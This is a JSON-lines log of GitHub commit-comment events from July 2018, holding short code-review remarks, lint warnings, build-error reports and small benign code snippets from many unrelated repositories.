{"id":"7986087878","type":"CommitCommentEvent","actor":{"login":"1Bennell"},"repo":{"name":"blockchain/My-Wallet-V3"},"payload":{"comment":{"id":29757585,"position":null,"line":null,"path":null,"commit_id":"332aef2dcc5bb8a65be808f2a222ef01419cd223","created_at":"2018-07-18T23:56:47Z","updated_at":"2018-07-18T23:56:47Z","author_association":"NONE","body":"Need some help "}},"created_at":"2018-07-18T23:56:47Z"}
{"id":"7986088059","type":"CommitCommentEvent","actor":{"login":"vpzomtrrfrt"},"repo":{"name":"Guzaboo/lombardo"},"payload":{"comment":{"id":29757586,"position":8,"line":8,"path":"lombardo.js","commit_id":"7c839784c9c09c0720b046b51dae3328c6f02c24","created_at":"2018-07-18T23:56:51Z","updated_at":"2018-07-18T23:56:51Z","author_association":"NONE","body":"These numbers don't belong in the source code."}},"created_at":"2018-07-18T23:56:51Z"}
{"id":"7986088713","type":"CommitCommentEvent","actor":{"login":"vpzomtrrfrt"},"repo":{"name":"Guzaboo/lombardo"},"payload":{"comment":{"id":29757590,"position":28,"line":28,"path":"lombardo.js","commit_id":"7c839784c9c09c0720b046b51dae3328c6f02c24","created_at":"2018-07-18T23:57:04Z","updated_at":"2018-07-18T23:57:04Z","author_association":"NONE","body":"`process.exit` is what you're looking for"}},"created_at":"2018-07-18T23:57:04Z"}
{"id":"7986090066","type":"CommitCommentEvent","actor":{"login":"jonocarroll"},"repo":{"name":"ropensci/bomrang"},"payload":{"comment":{"id":29757595,"position":null,"line":null,"path":null,"commit_id":"bc0540862fac95b7d3b74eba503a497cb05a7293","created_at":"2018-07-18T23:57:32Z","updated_at":"2018-07-18T23:57:32Z","author_association":"COLLABORATOR","body":"> 1 addition and 520 deletions.\r\n\r\n<chef kiss>"}},"created_at":"2018-07-18T23:57:32Z"}
{"id":"7986091149","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29757599,"position":null,"line":null,"path":null,"commit_id":"cf4b8606842b35246097e10c623b8415be760a6b","created_at":"2018-07-18T23:57:55Z","updated_at":"2018-07-18T23:57:55Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-18T23:57:55Z"}
{"id":"7986091155","type":"CommitCommentEvent","actor":{"login":"vpzomtrrfrt"},"repo":{"name":"Guzaboo/lombardo"},"payload":{"comment":{"id":29757600,"position":75,"line":75,"path":"lombardo.js","commit_id":"7c839784c9c09c0720b046b51dae3328c6f02c24","created_at":"2018-07-18T23:57:55Z","updated_at":"2018-07-18T23:57:55Z","author_association":"NONE","body":"Why?\r\n\r\nIf you actually want a delay here, use setTimeout to avoid freezing everything"}},"created_at":"2018-07-18T23:57:55Z"}
{"id":"7986092288","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29757605,"position":null,"line":null,"path":null,"commit_id":"0e291b55949d5304af4c11e81e4b21357df34207","created_at":"2018-07-18T23:58:17Z","updated_at":"2018-07-18T23:58:17Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-18T23:58:17Z"}
{"id":"7986093609","type":"CommitCommentEvent","actor":{"login":"Guzaboo"},"repo":{"name":"Guzaboo/lombardo"},"payload":{"comment":{"id":29757608,"position":8,"line":8,"path":"lombardo.js","commit_id":"7c839784c9c09c0720b046b51dae3328c6f02c24","created_at":"2018-07-18T23:58:47Z","updated_at":"2018-07-18T23:58:47Z","author_association":"OWNER","body":"yes they do"}},"created_at":"2018-07-18T23:58:47Z"}
{"id":"7986094784","type":"CommitCommentEvent","actor":{"login":"Guzaboo"},"repo":{"name":"Guzaboo/lombardo"},"payload":{"comment":{"id":29757612,"position":28,"line":28,"path":"lombardo.js","commit_id":"7c839784c9c09c0720b046b51dae3328c6f02c24","created_at":"2018-07-18T23:59:11Z","updated_at":"2018-07-18T23:59:11Z","author_association":"OWNER","body":"that's not any fun"}},"created_at":"2018-07-18T23:59:11Z"}
{"id":"7986095833","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29757615,"position":null,"line":null,"path":null,"commit_id":"56659895404d63fb6f4589b6dbe7543499a29e51","created_at":"2018-07-18T23:59:32Z","updated_at":"2018-07-18T23:59:32Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-18T23:59:32Z"}
{"id":"7986096473","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29757620,"position":null,"line":null,"path":null,"commit_id":"45e360ea168fc80fb4cf84eac8d4801ae4ffa92b","created_at":"2018-07-18T23:59:45Z","updated_at":"2018-07-18T23:59:45Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-18T23:59:45Z"}
{"id":"7980352130","type":"CommitCommentEvent","actor":{"login":"jjxtra"},"repo":{"name":"jjxtra/ExchangeSharp"},"payload":{"comment":{"id":29743391,"position":315,"line":315,"path":"ExchangeSharp/API/Common/SignalrManager.cs","commit_id":"e878f6ec23628138a93b581f31d4d45d964735dd","created_at":"2018-07-18T03:00:17Z","updated_at":"2018-07-18T03:00:17Z","author_association":"OWNER","body":"No it just loops endlessly until a connection is re-established"}},"created_at":"2018-07-18T03:00:17Z"}
{"id":"7980353998","type":"CommitCommentEvent","actor":{"login":"yushijinhun"},"repo":{"name":"bs-community/skinview3d"},"payload":{"comment":{"id":29743398,"position":17,"line":19,"path":"src/animation.ts","commit_id":"a48f935f06f70717355b0b0f62d2cb684afe1ddd","created_at":"2018-07-18T03:00:56Z","updated_at":"2018-07-18T03:00:56Z","author_association":"MEMBER","body":"Maybe you forgot to define the `Animation` type.\r\n\r\n```typescript\r\ntype AnimationFn = (player: PlayerObject, time: number) => void;\r\ntype Animation = AnimationFn | IAnimation;\r\n```"}},"created_at":"2018-07-18T03:00:56Z"}
{"id":"7980355583","type":"CommitCommentEvent","actor":{"login":"Dgocamp"},"repo":{"name":"Dgocamp/LeydeOhm"},"payload":{"comment":{"id":29743406,"position":4,"line":0,"path":"src/leydeohm/LeyDeOhm.java","commit_id":"4df2f06e32a08a5b7d28ab01fd41ba095b041010","created_at":"2018-07-18T03:01:30Z","updated_at":"2018-07-18T03:01:30Z","author_association":"OWNER","body":"Ahahahaj"}},"created_at":"2018-07-18T03:01:30Z"}
{"id":"7980356218","type":"CommitCommentEvent","actor":{"login":"cqsd"},"repo":{"name":"cqsd/dotfiles"},"payload":{"comment":{"id":29743408,"position":18,"line":17,"path":"base.fish","commit_id":"25be5716b1429d7411c5e8e47b710a19d19daac3","created_at":"2018-07-18T03:01:44Z","updated_at":"2018-07-18T03:01:44Z","author_association":"OWNER","body":"#3 reminded me i don't use vi mode in fish, big thx to @rahuldhir for this effort"}},"created_at":"2018-07-18T03:01:44Z"}
{"id":"7980356974","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29743409,"position":73,"line":null,"path":"app/src/at-trivo/java/asiantech/internship/summer/asynctack_thread_handler/AsyncTaskThreadHandlerActivity.java","commit_id":"9dd59b99217dcead21afc1591e862fd9632f496b","created_at":"2018-07-18T03:02:02Z","updated_at":"2018-07-18T03:02:02Z","author_association":"NONE","body":"WARNING: [IfStmtsMustUseBraces] Avoid using if statements without curly braces\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/braces.html#IfStmtsMustUseBraces"}},"created_at":"2018-07-18T03:02:02Z"}
{"id":"7980356985","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29743410,"position":97,"line":null,"path":"app/src/at-trivo/java/asiantech/internship/summer/asynctack_thread_handler/AsyncTaskThreadHandlerActivity.java","commit_id":"9dd59b99217dcead21afc1591e862fd9632f496b","created_at":"2018-07-18T03:02:02Z","updated_at":"2018-07-18T03:02:02Z","author_association":"NONE","body":"WARNING: [IfStmtsMustUseBraces] Avoid using if statements without curly braces\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/braces.html#IfStmtsMustUseBraces"}},"created_at":"2018-07-18T03:02:02Z"}
{"id":"7980358663","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29743417,"position":null,"line":null,"path":null,"commit_id":"00e07c3f72fc215a863d502df88ac4fc19466676","created_at":"2018-07-18T03:02:37Z","updated_at":"2018-07-18T03:02:37Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-18T03:02:37Z"}
{"id":"7980364346","type":"CommitCommentEvent","actor":{"login":"zardyh"},"repo":{"name":"tmpim/amulet"},"payload":{"comment":{"id":29743424,"position":null,"line":null,"path":null,"commit_id":"bb25ad9fd1608d5d52b8573f47d55d9fd413b6ad","created_at":"2018-07-18T03:04:46Z","updated_at":"2018-07-18T03:04:46Z","author_association":"COLLABORATOR","body":"I meant `'g ~ list int` in the second solution."}},"created_at":"2018-07-18T03:04:46Z"}
{"id":"7980364864","type":"CommitCommentEvent","actor":{"login":"Seaofbbs"},"repo":{"name":"Seaofbbs/SwordQuest-Ao-AirWorld"},"payload":{"comment":{"id":29743425,"position":null,"line":null,"path":null,"commit_id":"cb1aff6aad39ca6b48d1dfcd833df49c94a2fc4d","created_at":"2018-07-18T03:04:59Z","updated_at":"2018-07-18T03:04:59Z","author_association":"OWNER","body":"雅达利2600模拟器 for Windows，包含32位、64位和英文的介绍手册。"}},"created_at":"2018-07-18T03:04:59Z"}
{"id":"7980364901","type":"CommitCommentEvent","actor":{"login":"alphapapa"},"repo":{"name":"magnusmalm/magit-todos"},"payload":{"comment":{"id":29743426,"position":null,"line":null,"path":null,"commit_id":"da29296dadbbb7f7c1437e5f9bcb7187c2966f09","created_at":"2018-07-18T03:05:00Z","updated_at":"2018-07-18T03:05:00Z","author_association":"NONE","body":"I appreciate your working on this. If possible, I’d prefer to have a single magit-todos-ignore-globs option that would be correctly handled by each scanner. \r\n\r\nThe eieio error is strange since we only use it for magit-section code. Try using debug-on-error to get a backtrace. Also, if you haven’t used it before, look into using edebug, as it’s usually easier than inserting print statements (although sometimes logging messages is needed too)."}},"created_at":"2018-07-18T03:05:00Z"}
{"id":"7980365032","type":"CommitCommentEvent","actor":{"login":"Rainmen-xia"},"repo":{"name":"vuejs/vue"},"payload":{"comment":{"id":29743427,"position":null,"line":null,"path":null,"commit_id":"a879ec06ef9504db8df2a19aac0d07609fe36131","created_at":"2018-07-18T03:05:02Z","updated_at":"2018-07-18T03:05:02Z","author_association":"NONE","body":"nice"}},"created_at":"2018-07-18T03:05:02Z"}
{"id":"7980367981","type":"CommitCommentEvent","actor":{"login":"haskell-jp-bot"},"repo":{"name":"haskell-jp/blog"},"payload":{"comment":{"id":29743437,"position":null,"line":null,"path":null,"commit_id":"b2837c47c719d8b7d6982ee3769e01e3a7fa6179","created_at":"2018-07-18T03:06:12Z","updated_at":"2018-07-18T03:06:12Z","author_association":"NONE","body":"https://circleci.com/gh/haskell-jp/blog/496/artifacts/0/root/project/generated-site/index.html"}},"created_at":"2018-07-18T03:06:12Z"}
{"id":"7980369109","type":"CommitCommentEvent","actor":{"login":"yushijinhun"},"repo":{"name":"bs-community/skinview3d"},"payload":{"comment":{"id":29743456,"position":54,"line":62,"path":"src/animation.ts","commit_id":"a48f935f06f70717355b0b0f62d2cb684afe1ddd","created_at":"2018-07-18T03:06:38Z","updated_at":"2018-07-18T03:06:38Z","author_association":"MEMBER","body":"Why do you use a property to store `AnimationHandle`? I think it's better to change it back to a local variable."}},"created_at":"2018-07-18T03:06:38Z"}
{"id":"7980371514","type":"CommitCommentEvent","actor":{"login":"g-plane"},"repo":{"name":"bs-community/skinview3d"},"payload":{"comment":{"id":29743461,"position":4,"line":11,"path":"package.json","commit_id":"a48f935f06f70717355b0b0f62d2cb684afe1ddd","created_at":"2018-07-18T03:07:36Z","updated_at":"2018-07-18T03:07:36Z","author_association":"MEMBER","body":"Keep this `test` npm script. Don't change it."}},"created_at":"2018-07-18T03:07:36Z"}
{"id":"7980378507","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"endlessm/coding-discovery-center"},"payload":{"comment":{"id":29743469,"position":1,"line":1,"path":"data/meson.build","commit_id":"bc07945e128b3aa03167263e8a17af9b5f7e6b22","created_at":"2018-07-18T03:10:17Z","updated_at":"2018-07-18T03:10:17Z","author_association":"CONTRIBUTOR","body":"This can be LGPL'd"}},"created_at":"2018-07-18T03:10:17Z"}
{"id":"7980378539","type":"CommitCommentEvent","actor":{"login":"Hacksore"},"repo":{"name":"bs-community/skinview3d"},"payload":{"comment":{"id":29743470,"position":5,"line":63,"path":".gitignore","commit_id":"a48f935f06f70717355b0b0f62d2cb684afe1ddd","created_at":"2018-07-18T03:10:18Z","updated_at":"2018-07-18T03:10:18Z","author_association":"COLLABORATOR","body":"@yushijinhun I'll fix this next commit."}},"created_at":"2018-07-18T03:10:18Z"}
{"id":"7980378590","type":"CommitCommentEvent","actor":{"login":"breburges"},"repo":{"name":"pilotaids/ser216Group3Project"},"payload":{"comment":{"id":29743471,"position":null,"line":null,"path":null,"commit_id":"e856120bc513fbaf82a48e8bf6ea3f48fb453dd2","created_at":"2018-07-18T03:10:19Z","updated_at":"2018-07-18T03:10:19Z","author_association":"NONE","body":"[project_week2_jubula.pdf](https://github.com/pilotaids/ser216Group3Project/files/2204216/project_week2_jubula.pdf)\r\n"}},"created_at":"2018-07-18T03:10:19Z"}
{"id":"7980379960","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"endlessm/coding-discovery-center"},"payload":{"comment":{"id":29743473,"position":14,"line":14,"path":"debian/rules","commit_id":"bc07945e128b3aa03167263e8a17af9b5f7e6b22","created_at":"2018-07-18T03:10:54Z","updated_at":"2018-07-18T03:10:54Z","author_association":"CONTRIBUTOR","body":"These debian package removals probably don't belong in this commit"}},"created_at":"2018-07-18T03:10:54Z"}
{"id":"7980381771","type":"CommitCommentEvent","actor":{"login":"MADAO27"},"repo":{"name":"MADAO27/hello-world"},"payload":{"comment":{"id":29743476,"position":4,"line":2,"path":"README.md","commit_id":"afe54081092381140b2f16a156ac43729aae8f0f","created_at":"2018-07-18T03:11:32Z","updated_at":"2018-07-18T03:11:32Z","author_association":"OWNER","body":"11"}},"created_at":"2018-07-18T03:11:32Z"}
{"id":"7980382281","type":"CommitCommentEvent","actor":{"login":"MADAO27"},"repo":{"name":"MADAO27/hello-world"},"payload":{"comment":{"id":29743477,"position":1,"line":1,"path":"README.md","commit_id":"afe54081092381140b2f16a156ac43729aae8f0f","created_at":"2018-07-18T03:11:43Z","updated_at":"2018-07-18T03:11:43Z","author_association":"OWNER","body":"22"}},"created_at":"2018-07-18T03:11:43Z"}
{"id":"7980384069","type":"CommitCommentEvent","actor":{"login":"Hacksore"},"repo":{"name":"bs-community/skinview3d"},"payload":{"comment":{"id":29743480,"position":4,"line":11,"path":"package.json","commit_id":"a48f935f06f70717355b0b0f62d2cb684afe1ddd","created_at":"2018-07-18T03:12:24Z","updated_at":"2018-07-18T03:12:24Z","author_association":"COLLABORATOR","body":"No plan on removing this just did not want the karma test to run while converting to TS. I'll add it back though. "}},"created_at":"2018-07-18T03:12:24Z"}
{"id":"7980385843","type":"CommitCommentEvent","actor":{"login":"yushijinhun"},"repo":{"name":"bs-community/skinview3d"},"payload":{"comment":{"id":29743483,"position":29,"line":40,"path":"src/model.ts","commit_id":"a48f935f06f70717355b0b0f62d2cb684afe1ddd","created_at":"2018-07-18T03:13:04Z","updated_at":"2018-07-18T03:13:04Z","author_association":"MEMBER","body":"I use this variable to avoid two faces from overlapping. Maybe it's better to put it somewhere else?"}},"created_at":"2018-07-18T03:13:04Z"}
{"id":"7980388569","type":"CommitCommentEvent","actor":{"login":"Rwing"},"repo":{"name":"tonerdo/coverlet"},"payload":{"comment":{"id":29743486,"position":null,"line":null,"path":null,"commit_id":"3f44ad9ea17651d4d762e18ba0ae01a61aa14ce0","created_at":"2018-07-18T03:14:02Z","updated_at":"2018-07-18T03:14:02Z","author_association":"NONE","body":"why remove?"}},"created_at":"2018-07-18T03:14:02Z"}
{"id":"7980389445","type":"CommitCommentEvent","actor":{"login":"yushijinhun"},"repo":{"name":"bs-community/skinview3d"},"payload":{"comment":{"id":29743487,"position":42,"line":53,"path":"src/model.ts","commit_id":"a48f935f06f70717355b0b0f62d2cb684afe1ddd","created_at":"2018-07-18T03:14:22Z","updated_at":"2018-07-18T03:14:22Z","author_association":"MEMBER","body":"I think it should be private."}},"created_at":"2018-07-18T03:14:22Z"}
{"id":"7980390917","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"endlessm/coding-discovery-center"},"payload":{"comment":{"id":29743490,"position":5,"line":5,"path":"com.endlessm.Coding.DiscoveryCenter.yaml","commit_id":"fa2d010a0638f95cd0cb8732f39e20df5fd01db9","created_at":"2018-07-18T03:14:55Z","updated_at":"2018-07-18T03:14:55Z","author_association":"CONTRIBUTOR","body":"It'd be nice to make this into a template and use the `build-flatpak.sh` script that I have in other the other repositories: https://github.com/endlessm/showmehow-service/pull/54/commits/f012b1b9a89928b8e7583d1bb2ecf1ffcfc451f4 . I think a template is required to pick the branch to publish to anyway."}},"created_at":"2018-07-18T03:14:55Z"}
{"id":"7980391870","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29743492,"position":5,"line":187,"path":"desktop/src/com/frostwire/gui/components/transfers/TransferDetailGeneral.java","commit_id":"9579c67db1b144bfa4b96c6787b438a9289da6ff","created_at":"2018-07-18T03:15:15Z","updated_at":"2018-07-18T03:15:15Z","author_association":"COLLABORATOR","body":"didn't mean to include this now, reverting"}},"created_at":"2018-07-18T03:15:15Z"}
{"id":"7980392502","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"endlessm/coding-discovery-center"},"payload":{"comment":{"id":29743496,"position":29,"line":29,"path":"com.endlessm.Coding.DiscoveryCenter.yaml","commit_id":"fa2d010a0638f95cd0cb8732f39e20df5fd01db9","created_at":"2018-07-18T03:15:30Z","updated_at":"2018-07-18T03:15:30Z","author_association":"CONTRIBUTOR","body":"Add a template argument `@RUN_TESTS@`, which will default to `true` on jenkins."}},"created_at":"2018-07-18T03:15:30Z"}
{"id":"7980394661","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29743497,"position":null,"line":null,"path":null,"commit_id":"c2ea5d0a18fb451ccae1bf85d343a7948653cc55","created_at":"2018-07-18T03:16:15Z","updated_at":"2018-07-18T03:16:15Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-801](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-801).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-801-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-18T03:16:15Z"}
{"id":"7980398471","type":"CommitCommentEvent","actor":{"login":"sgdreamer7"},"repo":{"name":"vanyakulinich/home-expenses"},"payload":{"comment":{"id":29743501,"position":15,"line":13,"path":"frontend/src/index.js","commit_id":"d8d9248de92beffcbc3a4bbc5709f79a9f401ec4","created_at":"2018-07-18T03:17:43Z","updated_at":"2018-07-18T03:17:43Z","author_association":"NONE","body":"Вынеси инициализацию store'а в отдельный файл, а затем импортирую его здесь."}},"created_at":"2018-07-18T03:17:43Z"}
{"id":"7980400265","type":"CommitCommentEvent","actor":{"login":"sgdreamer7"},"repo":{"name":"vanyakulinich/home-expenses"},"payload":{"comment":{"id":29743505,"position":27,"line":25,"path":"frontend/src/index.js","commit_id":"d8d9248de92beffcbc3a4bbc5709f79a9f401ec4","created_at":"2018-07-18T03:18:24Z","updated_at":"2018-07-18T03:18:24Z","author_association":"NONE","body":"Вынеси инициализацию store'а в отдельный файл, а затем импортирую его здесь."}},"created_at":"2018-07-18T03:18:24Z"}
{"id":"7980400804","type":"CommitCommentEvent","actor":{"login":"FaigerSYS"},"repo":{"name":"FaigerSYS/AntiToolbox"},"payload":{"comment":{"id":29743507,"position":null,"line":null,"path":null,"commit_id":"a85e3755a7d3254be533ab445fd15780b3686ab5","created_at":"2018-07-18T03:18:37Z","updated_at":"2018-07-18T03:18:37Z","author_association":"OWNER","body":"@robske110 What do you mean by \"can easily be changed\"...? Client ID of Toolbox always equals zero (at least in MCBE 1.4). It does not matter what value is set in \"clientId.txt\", it always uses zero. Correct if I'm wrong."}},"created_at":"2018-07-18T03:18:37Z"}
{"id":"7980406157","type":"CommitCommentEvent","actor":{"login":"Darcman99"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29743512,"position":31,"line":139,"path":"data/fleet.txt","commit_id":"6d11764ba9517f12658b0cae199d47dff701acc9","created_at":"2018-07-18T03:20:34Z","updated_at":"2018-07-18T03:20:34Z","author_association":"OWNER","body":"Eh i guess i can do it the smart way."}},"created_at":"2018-07-18T03:20:34Z"}
{"id":"7980406218","type":"CommitCommentEvent","actor":{"login":"mikhailchuryakov"},"repo":{"name":"qcha/arfind"},"payload":{"comment":{"id":29743513,"position":17,"line":48,"path":"arfind-ui/src/main/java/qcha/arfind/view/ApplicationConfigurationView.java","commit_id":"1ee3da882e03fc9cc989af1dcc1be21529581cad","created_at":"2018-07-18T03:20:36Z","updated_at":"2018-07-18T03:20:36Z","author_association":"CONTRIBUTOR","body":"Так у нас изначально нет никакого стиля в этой таблице, что мы сеттить должны?"}},"created_at":"2018-07-18T03:20:36Z"}
{"id":"7980408336","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29743515,"position":308,"line":308,"path":"lib/node_modules/@stdlib/stats/incr/apcorr/test/test.js","commit_id":"80f96253bf726f33bc71d8eb68037ab203ae4cf9","created_at":"2018-07-18T03:21:23Z","updated_at":"2018-07-18T03:21:23Z","author_association":"MEMBER","body":"`(known mean)` should become `(known means)`"}},"created_at":"2018-07-18T03:21:23Z"}
{"id":"7980408940","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29743517,"position":267,"line":267,"path":"lib/node_modules/@stdlib/stats/incr/apcorr/test/test.js","commit_id":"80f96253bf726f33bc71d8eb68037ab203ae4cf9","created_at":"2018-07-18T03:21:38Z","updated_at":"2018-07-18T03:21:38Z","author_association":"MEMBER","body":"`(unknown mean)` should become `(unknown means)`"}},"created_at":"2018-07-18T03:21:38Z"}
{"id":"7980414388","type":"CommitCommentEvent","actor":{"login":"sgdreamer7"},"repo":{"name":"vanyakulinich/home-expenses"},"payload":{"comment":{"id":29743527,"position":3,"line":3,"path":"frontend/src/reducers/testReducer.jsx","commit_id":"d8d9248de92beffcbc3a4bbc5709f79a9f401ec4","created_at":"2018-07-18T03:23:39Z","updated_at":"2018-07-18T03:23:39Z","author_association":"NONE","body":"Все нормально, но лучше написать редьюсеры так:\r\n`\r\nimport { combineReducers } from 'redux';\r\nimport * as c from '../actionTypes/testActionType'\r\n\r\nconst test=(state, action) => {\r\nswitch (action.type) {\r\n        case c.TEST_ACTION:\r\n            return false;\r\n        default:\r\n            return state;\r\n    }\r\n}\r\nexport default combineReducers({\r\n    test,\r\n});`\r\n"}},"created_at":"2018-07-18T03:23:39Z"}
{"id":"7980415741","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29743528,"position":1,"line":1,"path":"1-Osnovy-Ruby-polnaya-PO/lesson5/module.rb","commit_id":"a6fe583efd143cc580fcc26aa93eaedd044e86d3","created_at":"2018-07-18T03:24:10Z","updated_at":"2018-07-18T03:24:10Z","author_association":"OWNER","body":"ponyal ispravlyayu..."}},"created_at":"2018-07-18T03:24:10Z"}
{"id":"7980416398","type":"CommitCommentEvent","actor":{"login":"cjd"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":29743529,"position":null,"line":null,"path":null,"commit_id":"1edbd8cb86c0a48d2e44ab0e6bca3c76c55931fe","created_at":"2018-07-18T03:24:26Z","updated_at":"2018-07-18T03:24:26Z","author_association":"COLLABORATOR","body":"This breaks compile on linux due to:\r\n===\r\nxLightsImportChannelMapDialog.cpp: In member function ‘void xLightsImportChannelMapDialog::OnDragPossible(wxDataViewEvent&)’:\r\nxLightsImportChannelMapDialog.cpp:1436:41: error: ‘class wxDataViewEvent’ has no member named ‘GetProposedDropIndex’\r\n     if (event.GetItem().IsOk() && event.GetProposedDropIndex() == -1) {\r\n===\r\nI can't even find that GetProposedDropIndex() function in the documentation under http://docs.wxwidgets.org/3.1/classwx_data_view_event.html\r\n\r\nWhere is that coming from?"}},"created_at":"2018-07-18T03:24:26Z"}
{"id":"7980432443","type":"CommitCommentEvent","actor":{"login":"sgdreamer7"},"repo":{"name":"vanyakulinich/home-expenses"},"payload":{"comment":{"id":29743551,"position":63,"line":42,"path":"frontend/src/routes/dashboard.jsx","commit_id":"d8d9248de92beffcbc3a4bbc5709f79a9f401ec4","created_at":"2018-07-18T03:30:41Z","updated_at":"2018-07-18T03:30:41Z","author_association":"NONE","body":"Можешь не комментировать, а смело удалять :)\r\nУ тебя ведь git - значит ты всегда можешь посмотреть и откатить на предыдущие версии."}},"created_at":"2018-07-18T03:30:41Z"}
{"id":"7980436866","type":"CommitCommentEvent","actor":{"login":"ondreian"},"repo":{"name":"kemalcr/kemal"},"payload":{"comment":{"id":29743555,"position":10,"line":63,"path":"spec/config_spec.cr","commit_id":"09bb1fcd4073a374b3a61c99e48e05a866b23c08","created_at":"2018-07-18T03:32:20Z","updated_at":"2018-07-18T03:32:20Z","author_association":"NONE","body":"Probably would just be better to use this to determine Crystal finds it to be valid semver or a prerelease: \r\nhttps://github.com/crystal-lang/crystal/blob/master/src/semantic_version.cr"}},"created_at":"2018-07-18T03:32:20Z"}
{"id":"7980436997","type":"CommitCommentEvent","actor":{"login":"kzc"},"repo":{"name":"fabiosantoscode/terser"},"payload":{"comment":{"id":29743557,"position":null,"line":null,"path":null,"commit_id":"68435eba3dbc14a2ff031544a627e6bc219edc5f","created_at":"2018-07-18T03:32:23Z","updated_at":"2018-07-18T03:32:23Z","author_association":"NONE","body":"@fabiosantoscode fyi... https://github.com/babel/minify#benchmarks"}},"created_at":"2018-07-18T03:32:23Z"}
{"id":"7980440805","type":"CommitCommentEvent","actor":{"login":"StevenArmandLee"},"repo":{"name":"skydoves/ColorPickerPreference"},"payload":{"comment":{"id":29743560,"position":12,"line":59,"path":"colorpickerpreference/src/main/java/com/skydoves/colorpickerpreference/ColorPickerView.java","commit_id":"a169feb617203095ac5b767163626f7003265102","created_at":"2018-07-18T03:33:56Z","updated_at":"2018-07-18T03:33:56Z","author_association":"NONE","body":"this is private but not final. I think we can give an option for the user to change this"}},"created_at":"2018-07-18T03:33:56Z"}
{"id":"7980443400","type":"CommitCommentEvent","actor":{"login":"sgdreamer7"},"repo":{"name":"vanyakulinich/home-expenses"},"payload":{"comment":{"id":29743568,"position":4,"line":4,"path":"backend/server/config.js","commit_id":"9a22442d2392961b2c3591cdaf2bb4ff3805a3cd","created_at":"2018-07-18T03:34:57Z","updated_at":"2018-07-18T03:34:57Z","author_association":"NONE","body":"Можно написать так:\r\n```javascript\r\nconst PORT = parseInt(process.env.REACT_APP_SERVER_PORT);\r\n....\r\n\r\n// src/.env файл\r\nREACT_APP_SERVER_PORT = 3001\r\n```"}},"created_at":"2018-07-18T03:34:57Z"}
{"id":"7980445317","type":"CommitCommentEvent","actor":{"login":"SuperPowerCoding"},"repo":{"name":"SuperPowerCoding/GreatDevelopers"},"payload":{"comment":{"id":29743575,"position":6,"line":6,"path":"Study/HackerRank/Alice and Bob's Silly Game/Java 7/jjhbaram.java","commit_id":"85d526271048f6a4d66b559482ae023a62c1f036","created_at":"2018-07-18T03:35:40Z","updated_at":"2018-07-18T03:35:40Z","author_association":"OWNER","body":"빈공간?"}},"created_at":"2018-07-18T03:35:40Z"}
{"id":"7980445476","type":"CommitCommentEvent","actor":{"login":"good18"},"repo":{"name":"PaddlePaddle/book"},"payload":{"comment":{"id":29743578,"position":null,"line":null,"path":null,"commit_id":"b326f9fe1cf9fc6cab34f5d56e55cfff22b20c03","created_at":"2018-07-18T03:35:43Z","updated_at":"2018-07-18T03:35:43Z","author_association":"NONE","body":"能否处理中文文本？"}},"created_at":"2018-07-18T03:35:43Z"}
